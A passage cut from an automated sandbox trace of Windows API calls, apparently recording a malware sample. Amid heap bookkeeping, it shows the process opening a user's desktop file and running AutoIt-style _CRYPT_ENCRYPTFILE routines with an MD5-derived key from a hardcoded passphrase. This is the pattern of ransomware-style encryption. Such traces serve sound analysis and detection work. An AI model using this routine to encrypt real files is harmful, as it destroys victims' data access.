lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0133.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\m9-n.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0133.934] FreeLibrary (hLibModule=0x772d0000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0133.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0133.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0133.936] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.936] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0133.936] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0133.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0133.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0133.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0133.938] CloseHandle (hObject=0x258) returned 1 [0133.938] FreeLibrary (hLibModule=0x772d0000) returned 1 [0133.938] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0133.938] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dadc4a0, ftCreationTime.dwHighDateTime=0x1d5f0b5, ftLastAccessTime.dwLowDateTime=0xc976ad70, ftLastAccessTime.dwHighDateTime=0x1d5e747, ftLastWriteTime.dwLowDateTime=0xc976ad70, ftLastWriteTime.dwHighDateTime=0x1d5e747, nFileSizeHigh=0x0, nFileSizeLow=0xb5e4, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="M9-n.avi", cAlternateFileName="")) returned 0x41ac280 [0133.938] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0133.938] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0133.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0133.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0133.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0133.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0133.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0133.939] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.940] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0133.940] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.940] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0133.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0133.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cadf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0133.940] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0133.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0133.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0133.940] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0133.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0133.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0133.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0133.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2848 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0133.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e27e8 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0133.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0133.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0133.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0133.942] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0133.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 